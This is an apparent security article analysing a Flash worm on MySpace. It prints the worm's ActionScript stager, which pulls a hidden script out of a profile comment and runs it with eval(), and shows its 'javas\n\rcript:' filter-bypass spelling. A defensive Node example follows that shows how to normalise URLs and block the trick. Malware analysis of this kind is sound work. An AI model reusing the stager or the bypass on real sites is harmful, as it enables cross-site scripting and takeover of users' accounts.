MySpace has been infected by a Flash-based (.swf) worm that is spreading rapidly through the site. It embeds JavaScript code into users' profiles that redirects visitors to a site claiming the US government was behind the 9/11 terrorist attacks, Symantec warned Monday. However, it may be just the tip of the iceberg. Let's take a look at how it works, to understand how easily it could be modified to deliver a far more devastating payload.

The unnamed worm isn't malicious yet, but the Shockwave Flash (.swf) file containing the payload embeds JavaScript into the profile of any MySpace user who views it. Replicating the "Samy is my friend" worm with it would not break a sweat.

That JavaScript is then interpreted by the browser of any user who visits the infected profile, allowing sensitive data to be stolen, such as the hash value MySpace requires before it will carry out operations as a user, and allowing operations to be performed on behalf of that user (obviously without consent). Currently, that access is used only to spread the JavaScript code to other profiles on the popular social network.

If the payload were malicious, it could launch secondary attacks, for example targeting the recently discovered vulnerabilities affecting Microsoft Office content. The impact would be far higher, exposing even sensitive information on your hard disk.

Let's take a look at the worm, thanks to research by kinematic.theory:

When you visit an already infected page, there is a Flash object embedded ("redirect.swf") which contains the ActionScript:

getURL("url");

It redirects you to the specified blog URL.

On that blog page there is another Flash file embedded, "retrievecookie.swf". It contains:

getURL("javas\n\rcript: var x = new ActiveXObject(\'Msxml2.XMLHTTP\');x.open(\'GET\',\'http://editprofile.myspace.com/index.cfm?fuseaction=user.HomeComments&friendID=93634373\',true);x.onreadystatechange=function(){if (x.readyState==4){var pg=x.responseText;var sc=pg.substring(pg.indexOf(\'BX-\')+3,pg.indexOf(\'-EX\'));while((sc.indexOf(\'\')!=-1)||(sc.indexOf(\'-XXX\')!=-1)){var n=sc.indexOf(\'\');if(n==-1)n=sc.indexOf(\'-XXX\');sc=sc.substring(0,n)+sc.substring(n+5,sc.length);};"
  + "eval(sc);}};"
  + "x.send(null);", "");

(The first separator literal in the while loop, apparently an HTML tag, was stripped when this page was rendered and appears empty above.)

It fetches the comments page of the MySpace profile with friendID 93634373 over XMLHTTP, pulls out the text between the BX- and -EX markers, strips the separators the comment renderer inserted, and evaluates the result with eval(). The "javas\n\rcript:" spelling is the filter bypass: a naive content filter looking for the literal string "javascript" does not match it, while the browser discards the embedded newline and carriage return and still treats the URL as a javascript: URL.
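The two mechanisms the stager relies on, pulling a second-stage script out of a fetched page between markers and hiding the javascript: scheme from a substring filter, are shown below as an added example. It is not the worm's code and not kinematic.theory's analysis; it is plain JavaScript that runs offline under Node, with no eval and no network. The function names (extractStagedScript, effectiveScheme, the two filter functions), the sample page and the '<br>' separator are assumptions of this example; the worm's own second separator did not survive on this page.

```javascript
// Added example: the staging step of retrievecookie.swf written as testable
// functions, plus the scheme-normalisation check that defeats the
// "javas\n\rcript:" trick. None of this is the worm's own code.

// The second-stage script is stored in a profile comment between these markers.
const START_MARKER = 'BX-';
const END_MARKER = '-EX';

// Separators the comment renderer inserts into the stored script. The worm
// strips '-XXX' and one HTML tag whose literal is missing from the write-up;
// '<br>' is an assumption used here for illustration only.
const SEPARATORS = ['-XXX', '<br>'];

// Return the text between the markers with every separator removed.
// Unlike the worm, which always deletes five characters at each match, each
// separator is removed by its own length, and a page without both markers
// yields null instead of a garbage substring.
function extractStagedScript(pageText, separators = SEPARATORS) {
  const start = pageText.indexOf(START_MARKER);
  const end = pageText.indexOf(END_MARKER);
  if (start === -1 || end === -1 || end < start) return null;
  let script = pageText.substring(start + START_MARKER.length, end);
  for (const sep of separators) {
    script = script.split(sep).join('');
  }
  return script;
}

// Constructed stand-in for the comments page the worm fetches with XMLHTTP.
const SAMPLE_PAGE =
  '<html><body><div class="comment">Nice profile!</div>' +
  '<div class="comment">BX-var msg=-XXX"hi";<br>' +
  'document.title-XXX=msg;-EX</div></body></html>';

// A filter that looks for the literal prefix "javascript:" misses the
// worm's "javas\n\rcript:" spelling.
function naiveSchemeFilterBlocks(url) {
  return url.toLowerCase().startsWith('javascript:');
}

// Browsers (today codified by the WHATWG URL parser) trim leading and
// trailing C0 controls and spaces and drop every tab, LF and CR before
// reading the scheme, so the check has to do the same normalisation.
function effectiveScheme(url) {
  const cleaned = url
    .replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, '') // leading/trailing C0 + space
    .replace(/[\t\n\r]/g, '');                    // embedded tab/LF/CR anywhere
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(cleaned);
  return m ? m[1].toLowerCase() : null;
}

function hardenedSchemeFilterBlocks(url) {
  return effectiveScheme(url) === 'javascript';
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(extractStagedScript(SAMPLE_PAGE));
  const wormUrl = 'javas\n\rcript: var x = new ActiveXObject("Msxml2.XMLHTTP");';
  console.log('naive blocks:', naiveSchemeFilterBlocks(wormUrl));
  console.log('hardened blocks:', hardenedSchemeFilterBlocks(wormUrl));
}
```

Run it with `node stager.js`: the extracted script comes back as `var msg="hi";document.title=msg;`, the naive filter lets the worm's URL through and the normalised check blocks it. The point of effectiveScheme is that any filter deciding on a URL must compare the scheme the browser will actually use, not the raw bytes it was handed.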

This code obtains your MySpace hash, which allows anyone holding it to act as you on MySpace and perform any operation on your behalf: changing your password, adding an unknown person as your friend, anything you can do on MySpace. Currently the code only adds a message to your MySpace profile. It makes extensive use of AJAX for its operations.